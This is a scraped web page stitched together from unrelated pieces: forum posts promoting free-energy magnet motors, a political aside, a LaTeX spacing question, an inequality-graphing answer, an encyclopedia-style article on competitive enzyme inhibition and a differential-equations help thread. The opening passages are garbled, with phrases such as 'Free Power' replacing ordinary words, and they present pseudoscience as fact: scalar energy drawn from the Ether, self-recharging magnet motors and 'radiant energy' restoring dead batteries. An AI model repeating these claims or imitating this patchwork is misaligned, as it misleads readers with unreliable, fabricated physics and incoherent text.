Of course that Free Power such motor (like the one described by you) would not spin at all and is Free Power stupid ideea. The working examples (at least some of them) are working on another principle/phenomenon. They don’t use the attraction and repeling forces of the magnets as all of us know. I repeat: that is Free Power stupid ideea. The magnets whou repel each other would loose their strength in time, anyway. The ideea is that in some configuration of the magnets Free Power scalar energy vortex is created with the role to draw energy from the Ether and this vortex is repsonsible for the extra energy or movement of the rotor. There are scalar energy detectors that can prove that this is happening. You can’t detect scalar energy with conventional tools. The vortex si an ubiquitos thing in nature. But you don’t know that because you are living in an urbanized society and you are lacking the direct interaction with the natural phenomena. Most of the time people like you have no oportunity to observe the Nature all the day and are relying on one of two major fairy-tales to explain this world: religion or mainstream science. The magnetism is more than the attraction and repelling forces. If you would have studied some books related to magnetism (who don’t even talk about free-energy or magnetic motors) you would have known by now that magnetism is such Free Power complex thing and has Free Power lot of application in Free Power wide range of domains.
A former whistleblower, who has spoken with agents from the Free Power Free Electricity FBI field office last year and worked for years as an undercover informant collecting information on Russia’s nuclear energy industry for the bureau, noted his enormous frustration with the DOJ and FBI. He describes as Free Power two-tiered justice system that failed to actively investigate the information he provided years ago on the Free Electricity Foundation and Russia’s dangerous meddling with the U. S. nuclear industry and energy industry during the Obama administration.
The high concentrations of A “push” the reaction series (A ⇌ B ⇌ C ⇌ D) to the right, while the low concentrations of D “pull” the reactions in the same direction. Providing Free Power high concentration of Free Power reactant can “push” Free Power chemical reaction in the direction of products (that is, make it run in the forward direction to reach equilibrium). The same is true of rapidly removing Free Power product, but with the low product concentration “pulling” the reaction forward. In Free Power metabolic pathway, reactions can “push” and “pull” each other because they are linked by shared intermediates: the product of one step is the reactant for the next^{Free Power, Free energy }Free Power, Free energy. “Think of Two Powerful Magnets. One fixed plate over rotating disk with Free Energy side parallel to disk surface, and other on the rotating plate connected to small gear G1. If the magnet over gear G1’s north side is parallel to that of which is over Rotating disk then they both will repel each other. Now the magnet over the left disk will try to rotate the disk below in (think) clock-wise direction. Now there is another magnet at Free Electricity angular distance on Rotating Disk on both side of the magnet M1. Now the large gear G0 is connected directly to Rotating disk with Free Power rod. So after repulsion if Rotating-Disk rotates it will rotate the gear G0 which is connected to gear G1. So the magnet over G1 rotate in the direction perpendicular to that of fixed-disk surface. Now the angle and teeth ratio of G0 and G1 is such that when the magnet M1 moves Free Electricity degree, the other magnet which came in the position where M1 was, it will be repelled by the magnet of Fixed-disk as the magnet on Fixed-disk has moved 360 degrees on the plate above gear G1. So if the first repulsion of Magnets M1 and M0 is powerful enough to make rotating-disk rotate Free Electricity-degrees or more the disk would rotate till error occurs in position of disk, friction loss or magnetic energy loss. The space between two disk is just more than the width of magnets M0 and M1 and space needed for connecting gear G0 to rotating disk with Free Power rod. Now I’ve not tested with actual objects. When designing you may think of losses or may think that when rotating disk rotates Free Electricity degrees and magnet M0 will be rotating clock-wise on the plate over G2 then it may start to repel M1 after it has rotated about Free energy degrees, the solution is to use more powerful magnets.
The device he built vibrated when it ran and you had to spin it to start it but me and him saw it run. Dad was Free Power mechanic and Free Power machinist. He later broke it up so no one would have his idea. I remember how it was made. The motor was amazing. Here’s some more information. Run your motor on Free Electricity volts (Free Electricity X Free Electricity volt batteries, series connection.) Connect another, old , worn out, totally dead battery, in parallel, to the battery that has the positive alligator clip. Place the Positive ‘Run’ cable on this dead battery, start the motor and bring it to maximum RPM and connect the positive alligator clip to the same dead battery. Make sure the electrolyte is full in every cell. After two hours run time, test the battery. If the radiant energy connections were done correctly, the dead battery will run like new. The RA breaks the calcification off the plates and restores the battery to full output and you can use it like Free Power new battery! After you burn the surface charge clean, place Free Power battery tester on the battery. You’ll be pleasantly surprised! Atomic Bomb!?! Wow, there’s Free Power stretch! Let’s take Free Power ton of TNT and use it to split an atom and release the power already in that atom. Here’s my question; Now recycle that energy and explain how? A Magnet Motor is the single most efficient motor available. This is the only motor that starts using Free Power battery, achieves maximum RPM and then recharges and maintains the battery that started it. Radiant energy ! radiant energy is produced at every Hydro-Electric Dam on the planet. They drive Free Power lightening rod in the ground and dispose of it. RE cannot be used with circuitry or Motors, melts circuitry, over-heats and melts motors. Free Electricity regular light bulbs okay, but even they run damn hot! RE is accompanied by AC electricity and that doesn’t help any either.
Free Power is now Free Energy Trump’s Secretary of labor, which is interesting because Trump has pledged to deal with the human sex trafficking issue. In his first month in office, the Free Power said he was “prepared to bring the full force and weight of our government” to end human trafficking, and he signed an executive order directing federal law enforcement to prioritize dismantling the criminal organizations behind forced labor, sex trafficking, involuntary servitude and child exploitation. You can read more about that and the results that have been achieved, here.
#### What is the name he gave it for research reasons? Thanks for the discussion. I appreciate the input. I assume you have investigated the Free Energy and found none worthy of further research? What element of the idea is failing? If one is lucky enough to keep something rotating on it’s own, the drag of Free Power crankshaft or the drag of an “alternator” to produce electricity at the same time seems like it would be too much to keep the motor running. Forget about discussing which type of battery it msy charge or which vehicle it may power – the question is does it work? No one anywhere in the world has ever gotten Free Power magnetic motor to run, let alone power anything. If you invest in one and it seems to be taking Free Power very long time to develop it means one thing – you have been stung. Free Energy’t say you haven’t been warned. As an optimist myself, I want to see it work and think it can. It would have to be more than self-sustaining, enough to recharge offline Free Energy-Fe-nano-Phosphate batteries.
“It wasn’t long before carriage makers were driving horseless carriages. It wasn’t long before people crossing the continent on trains abandoned the railroads for airliners. Natural gas is replacing coal and there is nothing the railroads, the coal miners, or the coal companies can do about it. Cheaper and more efficient energy always wins out over more expensive energy. Coal replaced wood, and oil replaced coal as the primary source of energy. Anything that is more efficient boosts the figures on the bottom line of the ledger. Dollars chase efficiency. Inefficiency is suppressed by market forces. Free Power wins in the market place.
|
|
# Vertical space between proof and theorem environments
When compiling my latex file, the space between the ending of theorem body and the word proof appears to be a bit much. I know how to individual manage this using \vspace, but I want to change the settings in the preamble so that even propositions, lemmas and corollaries have the same vertical distance between the starting of the proof. I have included my latex file here. Any help will be much appreciated.
\documentclass[12pt,a4paper]{article}
\usepackage[latin1]{inputenc}
\usepackage{amsfonts}
\usepackage{amssymb}
\usepackage[left=3.50cm, right=3.0cm, top=3.0cm, bottom=3.0cm]{geometry}
\usepackage{enumitem}
\usepackage{amsthm}
\usepackage{amsmath}
\setlength{\parskip}{5mm}
\setlength{\parindent}{0mm}
\setlength{\skip\footins}{1.6cm}
\setlength{\footnotesep}{0.5cm}
\newtheorem{thm}{Theorem}[section]
\newtheorem{lemma}[thm]{Lemma}
\newtheorem{proposition}[thm]{Proposition}
\newtheorem{cor}[thm]{Corollary}
\theoremstyle{definition}
\newtheorem{defn}[thm]{Definition}
\newtheorem{exmp}[thm]{Example}
\newtheorem{remark}[thm]{Remark}
\newcommand{\prn}{\mathrel{\mathrm{prn}}}
\begin{document}
\begin{thm}
Let $G$ be a group with subgroups $H$ and $K$. Then $[H,K] \unlhd \langle H, K\rangle$
\end{thm}
\begin{proof}
Every element in $[H,K]$ belongs to $\langle H, K \rangle$ because of the way in which the elements of $\langle H, K \rangle$ are defined.
\end{proof}
\end{document}
• Could you please post a minimal working example of the code you are using so that everyone can know which packages are at stake ? – mvienney Mar 7 '17 at 17:52
• @mvienney I have edited my post to reflect what I need. – R Maharaj Mar 7 '17 at 18:05
You save 10 pt in vertical spacing with ntheorem default:
\documentclass[12pt,a4paper]{article}
\usepackage[utf8]{inputenc}
\usepackage[T1]{fontenc}
\usepackage{amsfonts, amssymb}
\usepackage[left=3.50cm, right=3.0cm, top=3.0cm, bottom=3.0cm]{geometry}
\usepackage{enumitem}
\usepackage{amsmath, amssymb}
\setlength{\parskip}{5mm}
\setlength{\parindent}{0mm}
\setlength{\skip\footins}{1.6cm}
\setlength{\footnotesep}{0.5cm}
\usepackage[amsmath, thmmarks]{ntheorem}
\theoremstyle{plain}
\theorembodyfont{\itshape}
\newtheorem{thm}{Theorem}[section]
\newtheorem{lemma}[thm]{Lemma}
\newtheorem{proposition}[thm]{Proposition}
\newtheorem{cor}[thm]{Corollary}
\theorembodyfont{\normalfont}
\newtheorem{defn}[thm]{Definition}
\newtheorem{exmp}[thm]{Example}
\newtheorem{remark}[thm]{Remark}
\theoremstyle{nonumberplain}
\theoremsymbol{ \ensuremath{\Box}}
\newtheorem{proof}{Proof}
\newcommand{\prn}{\mathrel{\mathrm{prn}}}
\begin{document}
\begin{thm}
Let $G$ be a group with subgroups $H$ and $K$. Then $[H,K] \unlhd \langle H, K\rangle$.
\end{thm}
%
\begin{proof}
Every element in $[H,K]$ belongs to $\langle H, K \rangle$ because of the way in which the elements of $\langle H, K \rangle$ are defined.
\end{proof}
%
\begin{defn}
A trivial definition
\end{defn}
\end{document}
• This looks really good but how can prevent the word theorem from being italicized? – R Maharaj Mar 8 '17 at 5:49
• @R Maharaj: Please see my updated answer. – Bernard Mar 8 '17 at 9:45
\documentclass{article}
\usepackage{amsthm}
\usepackage{thmtools,blindtext}
\declaretheorem{theorem}
\declaretheoremstyle[%
spaceabove=3pt,%reduce or increase between theorem and proof
spacebelow=20pt,%reduce or increase
qed=\qedsymbol%
]{mystyle}
\declaretheorem[name={Proof},style=mystyle,unnumbered,
]{pf}
\begin{document}
\begin{theorem}
\blindtext
\end{theorem}
\begin{pf}
BLAAAAAAAAAAAAAAAAAAAAAAA
\end{pf}
\begin{theorem}
\blindtext
\end{theorem}
\textbf{Normal}
\begin{proof}
\blindtext
\end{proof}
\end{document}
• the settings in amsthm for the space between theorem and proof assume that the default baselines and \parskip will not be changed. this answer redefines these to be fixed distances. those values may or may not be appropriate if the \linespread or \parskip is changed. they also don't allow any stretch if a page is broken "short" because of an unbreakable element (e.g., a math display) that doesn't fit and must be moved to the next page. – barbara beeton Mar 7 '17 at 18:31
|
|
# How do you graph the inequality x + y < 4?
Mar 22, 2016
Graph and solve linear inequality.
#### Explanation:
x + y < 4
First, graph the Line x + y = 4 by its 2 intercept.
Make x = 0 --> y = 4
Make y = 0 --> x = 4
The solution set of the inequality is the area below the Line.
Check with the origin.
Replace x = 0 and y = 0 into the inequality, we get: -> 0 < 4.
It is true, then, O is inside the solution set. OK
graph{x+ y = 4 [-10, 10, -5, 5]}
|
|
# Competitive inhibition
Competitive inhibition is interruption of a chemical pathway owing to one chemical substance inhibiting the effect of another by competing with it for binding or bonding. Any metabolic or chemical messenger system can potentially be affected by this principle, but several classes of competitive inhibition are especially important in biochemistry and medicine, including the competitive form of enzyme inhibition, the competitive form of receptor antagonism, the competitive form of antimetabolite activity, and the competitive form of poisoning (which can include any of the aforementioned types).
In competitive inhibition of enzyme catalysis, binding of an inhibitor prevents binding of the target molecule of the enzyme, also known as the substrate.[1] This is accomplished by blocking the binding site of the substrate – the active site – by some means. The Vmax indicates the maximum velocity of the reaction, while the Km is the amount of substrate needed to reach half of the Vmax. Km also plays a part in indicating the tendency of the substrate to bind the enzyme.[2] Competitive inhibition can be overcome by adding more substrate to the reaction, which increases the chances of the enzyme and substrate binding. As a result, competitive inhibition alters only the Km, leaving the Vmax the same.[3] This can be demonstrated using enzyme kinetics plots such as the Michaelis-Menten or the Lineweaver-Burk plot. Once the inhibitor is bound to the enzyme, the slope will be affected, as the Km either increases or decreases from the original Km of the reaction.[4][5][6]
Most competitive inhibitors function by binding reversibly to the active site of the enzyme.[1] As a result, many sources state that this is the defining feature of competitive inhibitors.[7] This, however, is a misleading oversimplification, as there are many possible mechanisms by which an enzyme may bind either the inhibitor or the substrate but never both at the same time.[1] For example, allosteric inhibitors may display competitive, non-competitive, or uncompetitive inhibition.[1]
## Mechanism
Diagram showing competitive inhibition
In competitive inhibition, an inhibitor that resembles the normal substrate binds to the enzyme, usually at the active site, and prevents the substrate from binding.[8] At any given moment, the enzyme may be bound to the inhibitor, the substrate, or neither, but it cannot bind both at the same time. During competitive inhibition, the inhibitor and substrate compete for the active site. The active site is a region on an enzyme which a particular protein or substrate can bind to. The active site will only allow one of the two complexes to bind to the site therefore either allowing for a reaction to occur or yielding it. In competitive inhibition the inhibitor resembles the substrate therefore taking its place and binding to the active site of an enzyme. Increasing the substrate concentration would diminish the "competition" for the substrate to properly bind to the active site and allow a reaction to occur.[3] When the substrate is of higher concentration than that of the competitive inhibitor, it is more likely that the substrate will come into contact with the enzyme's active site than the inhibitor.
Competitive inhibitors are commonly used to make pharmaceuticals.[3] For example, methotrexate is a chemotherapy drug that acts as a competitive inhibitor. It is structurally similar to the coenzyme, folate, which binds to the enzyme dihydrofolate reductase.[3] This enzyme is part of the synthesis of DNA and RNA, and when methotrexate binds the enzyme, it renders it inactive, so it cannot synthesize DNA and RNA.[3] Thus, the cancer cells are unable to grow and divide. Another example involves prostaglandins which are made in large amounts as a response to pain and can cause inflammation. Essential fatty acids form the prostaglandins and when this was discovered, it turned out that these were actually very good inhibitors to prostaglandins. These fatty acids inhibitors have been used as drugs to relieve pain because they can act as the substrate, and bind to the enzyme, and block prostaglandins.[9]
An example of non-drug related competitive inhibition is in the prevention of browning of fruits and vegetables. For example, tyrosinase, an enzyme within mushrooms, normally binds to the substrate, monophenols, and forms brown o-quinones.[10] Competitive substrates, such as 4-substituted benzaldehydes for mushrooms, compete with the substrate lowering the amount of the monophenols that bind. These inhibitory compounds added to the produce keep it fresh for longer periods of time by decreasing the binding of the monophenols that cause browning.[10] This allows for an increase in produce quality as well as shelf life.
Competitive inhibition can be reversible or irreversible. If it is reversible inhibition, then effects of the inhibitor can be overcome by increasing substrate concentration.[8] If it is irreversible, the only way to overcome it is to produce more of the target (and typically degrade and/or excrete the irreversibly inhibited target).
In virtually every case, competitive inhibitors bind in the same binding site (active site) as the substrate, but same-site binding is not a requirement. A competitive inhibitor could bind to an allosteric site of the free enzyme and prevent substrate binding, as long as it does not bind to the allosteric site when the substrate is bound. For example, strychnine acts as an allosteric inhibitor of the glycine receptor in the mammalian spinal cord and brain stem. Glycine is a major post-synaptic inhibitory neurotransmitter with a specific receptor site. Strychnine binds to an alternate site that reduces the affinity of the glycine receptor for glycine, resulting in convulsions due to lessened inhibition by the glycine.[11]
In competitive inhibition, the maximum velocity (${\displaystyle V_{\max }}$) of the reaction is unchanged, while the apparent affinity of the substrate to the binding site is decreased (the ${\displaystyle K_{d}}$ dissociation constant is apparently increased). The change in ${\displaystyle K_{m}}$ (Michaelis-Menten constant) is parallel to the alteration in ${\displaystyle K_{d}}$, as one increases the other must decrease. When a competitive inhibitor is bound to an enzyme the ${\displaystyle K_{m}}$ increases. This means the binding affinity for the enzyme is decreased, but it can be overcome by increasing the concentration of the substrate.[12] Any given competitive inhibitor concentration can be overcome by increasing the substrate concentration. In that case, the substrate will reduce the availability for an inhibitor to bind, and, thus, outcompete the inhibitor in binding to the enzyme.[12]
Competitive inhibition can also be allosteric, as long as the inhibitor and the substrate cannot bind the enzyme at the same time.
### Biological examples
After an accidental ingestion of a contaminated opioid drug desmethylprodine, the neurotoxic effect of 1-methyl-4-phenyl-1,2,3,6-tetrahydropyridine (MPTP) was discovered. MPTP is able to cross the blood brain barrier and enter acidic lysosomes.[13] MPTP is biologically activated by MAO-B, an isozyme of monoamine oxidase (MAO) which is mainly concentrated in neurological disorders and diseases.[14] Later, it was discovered that MPTP causes symptoms similar to that of Parkinson's disease. Cells in the central nervous system (astrocytes) include MAO-B that oxidizes MPTP to 1-methyl-4-phenylpyridinium (MPP+), which is toxic.[13] MPP+ eventually travels to the extracellular fluid by a dopamine transporter, which ultimately causes the Parkinson's symptoms. However, competitive inhibition of the MAO-B enzyme or the dopamine transporter protects against the oxidation of MPTP to MPP+. A few compounds have been tested for their ability to inhibit oxidation of MPTP to MPP+ including methylene blue, 5-nitroindazole, norharman, 9-methylnorharman, and menadione.[14] These demonstrated a reduction of neurotoxicity produced by MPTP.
Michaelis-Menten plot of the reaction velocity (v) against substrate concentration [S] of normal enzyme activity (1) compared to enzyme activity with a competitive inhibitor (2). Adding a competitive inhibitor to an enzymatic reaction increases the Km of the reaction, but the Vmax remains the same.
Lineweaver-Burk plot, the reciprocal of the Michaelis-Menten plot, of the reciprocal of velocity (1/V) vs the reciprocal of the substrate concentration (1/[S]) of normal enzyme activity (blue) compared to enzyme activity with a competitive inhibitor (red). Adding a competitive inhibitor to an enzymatic reaction increases the Km of the reaction, but the Vmax remains the same.
Sulfa drugs also act as competitive inhibitors. For example, sulfanilamide competitively binds to the enzyme in the dihydropteroate synthase (DHPS) active site by mimicking the substrate para-aminobenzoic acid (PABA).[15] This prevents the substrate itself from binding which halts the production of folic acid, an essential nutrient. Bacteria must synthesize folic acid because they do not have a transporter for it. Without folic acid, bacteria cannot grow and divide. Therefore, because of sulfa drugs' competitive inhibition, they are excellent antibacterial agents. An example of competitive inhibition was demonstrated experimentally for the enzyme succinic dehydrogenase, which catalyzes the oxidation of succinate to fumarate in the Krebs cycle. Malonate is a competitive inhibitor of succinic dehydrogenase. The binding of succinic dehydrogenase to the substrate, succinate, is competitively inhibited. This happens because malonate's chemistry is similar to succinate. Malonate's ability to inhibit binding of the enzyme and substrate is based on the ratio of malonate to succinate. Malonate binds to the active site of succinic dehydrogenase so that succinate cannot. Thus, it inhibits the reaction.[16]
Another possible mechanism for allosteric competitive inhibition.
## Equation
The Michaelis-Menten Model can be an invaluable tool to understanding enzyme kinetics. According to this model, a plot of the reaction velocity (V0) associated with the concentration [S] of the substrate can then be used to determine values such as Vmax, initial velocity, and Km (Vmax/2 or affinity of enzyme to substrate complex).[4]
Competitive inhibition increases the apparent value of the Michaelis-Menten constant, ${\displaystyle K_{m}^{\text{app}}}$, such that initial rate of reaction, ${\displaystyle V_{0}}$, is given by
${\displaystyle V_{0}={\frac {V_{\max }\,[S]}{K_{m}^{\text{app}}+[S]}}}$
where ${\displaystyle K_{m}^{\text{app}}=K_{m}(1+[I]/K_{i})}$, ${\displaystyle K_{i}}$ is the inhibitor's dissociation constant and ${\displaystyle [I]}$ is the inhibitor concentration.
${\displaystyle V_{\max }}$ remains the same because the presence of the inhibitor can be overcome by higher substrate concentrations. ${\displaystyle K_{m}^{\text{app}}}$, the substrate concentration that is needed to reach ${\displaystyle V_{\max }/2}$, increases with the presence of a competitive inhibitor. This is because the concentration of substrate needed to reach ${\displaystyle V_{\max }}$ with an inhibitor is greater than the concentration of substrate needed to reach ${\displaystyle V_{\max }}$ without an inhibitor.
## Derivation
In the simplest case of a single-substrate enzyme obeying Michaelis-Menten kinetics, the typical scheme
${\displaystyle {\ce {E + S <=>[k_1][k_{-1}] ES ->[k_2] E + P}}}$
is modified to include binding of the inhibitor to the free enzyme:
${\displaystyle {\ce {EI + S <=>[k_{-3}][k_3] E + S + I <=>[k_1][k_{-1}] ES + I ->[k_2] E + P + I}}}$
Note that the inhibitor does not bind to the ES complex and the substrate does not bind to the EI complex. It is generally assumed that this behavior is indicative of both compounds binding at the same site, but that is not strictly necessary. As with the derivation of the Michaelis-Menten equation, assume that the system is at steady-state, i.e. the concentration of each of the enzyme species is not changing.
${\displaystyle {\frac {d[{\ce {E}}]}{dt}}={\frac {d[{\ce {ES}}]}{dt}}={\frac {d[{\ce {EI}}]}{dt}}=0.}$
Furthermore, the known total enzyme concentration is ${\displaystyle [{\ce {E}}]_{0}=[{\ce {E}}]+[{\ce {ES}}]+[{\ce {EI}}]}$, and the velocity is measured under conditions in which the substrate and inhibitor concentrations do not change substantially and an insignificant amount of product has accumulated.
We can therefore set up a system of equations:
${\displaystyle [{\ce {E}}]_{0}=[{\ce {E}}]+[{\ce {ES}}]+[{\ce {EI}}]}$
(1)
${\displaystyle {\frac {d[{\ce {E}}]}{dt}}=0=-k_{1}[{\ce {E}}][{\ce {S}}]+k_{-1}[{\ce {ES}}]+k_{2}[{\ce {ES}}]-k_{3}[{\ce {E}}][{\ce {I}}]+k_{-3}[{\ce {EI}}]}$
(2)
${\displaystyle {\frac {d[{\ce {ES}}]}{dt}}=0=k_{1}[{\ce {E}}][{\ce {S}}]-k_{-1}[{\ce {ES}}]-k_{2}[{\ce {ES}}]}$
(3)
${\displaystyle {\frac {d[{\ce {EI}}]}{dt}}=0=k_{3}[{\ce {E}}][{\ce {I}}]-k_{-3}[EI]}$
(4)
where ${\displaystyle {\ce {[S], [I]}}}$ and ${\displaystyle {\ce {[E]_0}}}$ are known. The initial velocity is defined as ${\displaystyle V_{0}=d[{\ce {P}}]/dt=k_{2}[{\ce {ES}}]}$, so we need to define the unknown ${\displaystyle {\ce {[ES]}}}$ in terms of the knowns ${\displaystyle {\ce {[S], [I]}}}$ and ${\displaystyle {\ce {[E]_0}}}$.
From equation (3), we can define E in terms of ES by rearranging to
${\displaystyle k_{1}[{\ce {E}}][{\ce {S}}]=(k_{-1}+k_{2})[{\ce {ES}}]}$
Dividing by ${\displaystyle k_{1}[{\ce {S}}]}$ gives
${\displaystyle [{\ce {E}}]={\frac {(k_{-1}+k_{2})[{\ce {ES}}]}{k_{1}[{\ce {S}}]}}}$
As in the derivation of the Michaelis-Menten equation, the term ${\displaystyle (k_{-1}+k_{2})/k_{1}}$ can be replaced by the macroscopic rate constant ${\displaystyle K_{m}}$:
${\displaystyle [{\ce {E}}]={\frac {K_{m}[{\ce {ES}}]}{\ce {[S]}}}}$
(5)
Substituting equation (5) into equation (4), we have
${\displaystyle 0={\frac {k_{3}[{\ce {I}}]K_{m}[{\ce {ES}}]}{\ce {[S]}}}-k_{-3}[{\ce {EI}}]}$
Rearranging, we find that
${\displaystyle [{\ce {EI}}]={\frac {K_{m}k_{3}[{\ce {I}}][{\ce {ES}}]}{k_{-3}[{\ce {S}}]}}}$
At this point, we can define the dissociation constant for the inhibitor as ${\displaystyle K_{i}=k_{-3}/k_{3}}$, giving
${\displaystyle [{\ce {EI}}]={\frac {K_{m}[{\ce {I}}][{\ce {ES}}]}{K_{i}[{\ce {S}}]}}}$
(6)
At this point, substitute equation (5) and equation (6) into equation (1):
${\displaystyle [{\ce {E}}]_{0}={\frac {K_{m}[{\ce {ES}}]}{\ce {[S]}}}+[{\ce {ES}}]+{\frac {K_{m}[{\ce {I}}][{\ce {ES}}]}{K_{i}[{\ce {S}}]}}}$
Rearranging to solve for ES, we find
${\displaystyle [{\ce {E}}]_{0}=[{\ce {ES}}]\left({\frac {K_{m}}{\ce {[S]}}}+1+{\frac {K_{m}[{\ce {I}}]}{K_{i}[{\ce {S}}]}}\right)=[{\ce {ES}}]{\frac {K_{m}K_{i}+K_{i}[{\ce {S}}]+K_{m}[{\ce {I}}]}{K_{i}[{\ce {S}}]}}}$
${\displaystyle [{\ce {ES}}]={\frac {K_{i}[{\ce {S}}][{\ce {E}}]_{0}}{K_{m}K_{i}+K_{i}[{\ce {S}}]+K_{m}[{\ce {I}}]}}}$
(7)
Returning to our expression for ${\displaystyle V_{0}}$, we now have:
${\displaystyle V_{0}=k_{2}[{\ce {ES}}]={\frac {k_{2}K_{i}[{\ce {S}}][{\ce {E}}]_{0}}{K_{m}K_{i}+K_{i}[{\ce {S}}]+K_{m}[{\ce {I}}]}}}$
${\displaystyle V_{0}={\frac {k_{2}[{\ce {E}}]_{0}[{\ce {S}}]}{K_{m}+[{\ce {S}}]+K_{m}{\frac {[{\ce {I}}]}{K_{i}}}}}}$
Since the velocity is maximal when all the enzyme is bound as the enzyme-substrate complex, ${\displaystyle V_{\max }=k_{2}[{\ce {E}}]_{0}}$. Replacing and combining terms finally yields the conventional form:
${\displaystyle V_{0}={\frac {V_{\max }[{\ce {S}}]}{K_{m}\left(1+{\frac {[{\ce {I}}]}{K_{i}}}\right)+[{\ce {S}}]}}}$
(8)
To compute the concentration of competitive inhibitor ${\displaystyle {\ce {[I]}}}$ that yields a fraction ${\displaystyle f_{V{_{0}}}}$ of velocity ${\displaystyle V_{0}}$ where ${\displaystyle 0:
${\displaystyle [{\ce {I}}]=\left({\frac {1}{f_{V{_{0}}}}}-1\right)K_{i}\left(1+{\frac {[{\ce {S}}]}{K_{m}}}\right)}$
(9)
## Notes and references
1. ^ a b c d "Types of Inhibition". NIH Center for Translational Therapeutics. Archived from the original on 8 September 2011. Retrieved 2 April 2012.
2. ^ Lodish, Harvey; Berk, Arnold; Zipursky, S. Lawrence; Matsudaira, Paul; Baltimore, David; Darnell, James (2000). "Functional Design of Proteins". Molecular Cell Biology. 4th Edition.
3. Berg, Jeremy M.; Tymoczko, John L.; Stryer, Lubert (2002). "Enzymes Can Be Inhibited by Specific Molecules". Biochemistry. 5th Edition.
4. ^ a b Berg, Jeremy M.; Tymoczko, John L.; Stryer, Lubert (2002). "The Michaelis-Menten Model Accounts for the Kinetic Properties of Many Enzymes". Biochemistry. 5th Edition.
5. ^ Eadie, S. G. (1942). "The Inhibition of Cholinesterase by Physostigmine and Prostigmine". Journal of Biological Chemistry. 146: 85–93.
6. ^ Berg, Jeremy M.; Tymoczko, John L.; Stryer, Lubert (2002). "Appendix: Vmax and KM Can Be Determined by Double-Reciprocal Plots". Biochemistry. 5th Edition.
7. ^ Ophardt, Charles. "Virtual Chembook". Elmhurst College. Retrieved 1 September 2015.
8. ^ a b "Map: Biochemistry Free & Easy (Ahern and Rajagopal)". Biology LibreTexts. 24 December 2014. Retrieved 2 November 2017.
9. ^ Flower, Roderick J. (1 March 1974). "Drugs Which Inhibit Prostaglandin Biosynthesis". Pharmacological Reviews. 26 (1): 33–67. ISSN 0031-6997. PMID 4208101.
10. ^ a b Jiménez, Mercedes; Chazarra, Soledad; Escribano, Josefa; Cabanes, Juana; García-Carmona, Francisco (2001). "Competitive Inhibition of Mushroom Tyrosinase by 4-Substituted Benzaldehydes". Journal of Agricultural and Food Chemistry. 49 (8): 4060–4063. doi:10.1021/jf010194h.
11. ^ Dick RM (2011). "Chapter 2. Pharmacodynamics: The Study of Drug Action". In Ouellette R, Joyce JA (eds.). Pharmacology for Nurse Anesthesiology. Jones & Bartlett Learning. ISBN 978-0-7637-8607-6.
12. ^ a b Donald, Voet (29 February 2016). Fundamentals of biochemistry : life at the molecular level. Voet, Judith G.,, Pratt, Charlotte W. (Fifth ed.). Hoboken, NJ. ISBN 9781118918401. OCLC 910538334.
13. ^ a b Sian, J.; Youdim, M. B. H.; Riederer, P.; Gerlach, M. (1999). "MPTP-Induced Parkinsonian Syndrome". Basic Neurochemistry: Molecular, Cellular and Medical Aspects. 6th Edition.
14. ^ a b Herraiz, T; Guillén, H (August 2011). "Inhibition of the bioactivation of the neurotoxin MPTP by antioxidants, redox agents and monoamine oxidase inhibitors". Food and Chemical Toxicology. 49 (4): 1773–1781. doi:10.1016/j.fct.2011.04.026. hdl:10261/63126. PMID 21554916.
15. ^ "How Sulfa Drugs Work". National Institutes of Health (NIH). 15 May 2015. Retrieved 2 November 2017.
16. ^ Potter, V. R.; DuBois, K. P. (20 March 1943). "STUDIES ON THE MECHANISM OF HYDROGEN TRANSPORT IN ANIMAL TISSUES". The Journal of General Physiology. 26 (4): 391–404. doi:10.1085/jgp.26.4.391. ISSN 0022-1295. PMC 2142566. PMID 19873352.
|
|
# Math Help - Linear system--I have this 1/2 solved...
1. ## Linear system--I have this 1/2 solved...
E1: (2D + 1)x1 + (D^2 - 4)x2 = -7e^(-t)
E2: Dx1 - (D + 2)x2 = -3e^(-t)
Here's how I solved for x1:
1. Multiply E2 by (D - 2) to get:
(Dx1)(D-2) - (D^2 - 4)x2 = -3e^(-t) * (D-2)
2. Simplify the above and then add to E1 to get:
(D^2 + 1)x1 = 2e^(-t)
3. x1c = c1cos (t) + c2sin (t)
4. Then using Ae^(-t), x1p = e^(-t)
5. x1 = c1cos (t) + c2sin (t) + e^(-t)
How do I solve for x2? I'm lost again on this one! Thanks,
Kim
2. Originally Posted by Kim Nu
E1: (2D + 1)x1 + (D^2 - 4)x2 = -7e^(-t)
E2: Dx1 - (D + 2)x2 = -3e^(-t)
Here's how I solved for x1:
1. Multiply E2 by (D - 2) to get:
(Dx1)(D-2) - (D^2 - 4)x2 = -3e^(-t) * (D-2)
2. Simplify the above and then add to E1 to get:
(D^2 + 1)x1 = 2e^(-t)
3. x1c = c1cos (t) + c2sin (t)
4. Then using Ae^(-t), x1p = e^(-t)
5. x1 = c1cos (t) + c2sin (t) + e^(-t)
How do I solve for x2? I'm lost again on this one! Thanks,
Kim
Go back to your original equations and try to eliminate $x_1$
Hint try $D \cdot E_1+[-(2D+1)]E_2$ and see what happens.
3. Hey thanks Empty Set,
Now my posts are definitely getting annoying but:
I took your suggestion, which is the correct course of action; I end up with
x2 = c3cos(t) + c4sin(t) + c3e^(-2t) + 2e^(-t)
Then I take the before mentioned solved x1 value and x2 value and plug them into E2: Dx1 - (D + 2)x2 = -3e^(-t)
I work this all out and end up with:
sin (t)[-c1 + c3 -2c4] + cos (t)[c2 - c4 - 2c3) = -8e^(-t)
The answer in the back of the book is:
x1 = 5c1cost(t) + 5c2sin(t) + e^(-t)
x2 = (c1 + 2c2)cost + (-2c1 + c2)sin(t) + c3e^(-2t) + 2e^(-t)
So my answers are close to being correct, I just don't understand how those coefficient were arrived at. Do you have any suggestions? Thanks,
Kim
4. Originally Posted by Kim Nu
Hey thanks Empty Set,
Now my posts are definitely getting annoying but:
I took your suggestion, which is the correct course of action; I end up with
x2 = c3cos(t) + c4sin(t) + c3e^(-2t) + 2e^(-t)
Then I take the before mentioned solved x1 value and x2 value and plug them into E2: Dx1 - (D + 2)x2 = -3e^(-t)
I work this all out and end up with:
sin (t)[-c1 + c3 -2c4] + cos (t)[c2 - c4 - 2c3) = -8e^(-t)
The answer in the back of the book is:
x1 = 5c1cost(t) + 5c2sin(t) + e^(-t)
x2 = (c1 + 2c2)cost + (-2c1 + c2)sin(t) + c3e^(-2t) + 2e^(-t)
So my answers are close to being correct, I just don't understand how those coefficient were arrived at. Do you have any suggestions? Thanks,
Kim
I think $x_2$ should be this
$x_2 = c_3\cos(t) + c_4\sin(t) + c_5e^{-2t} + 2e^{-t}$
And your $x_1$ from your 1st post is
$x_1 = c_1\cos (t) + c_2\sin (t) + e^{-t}$
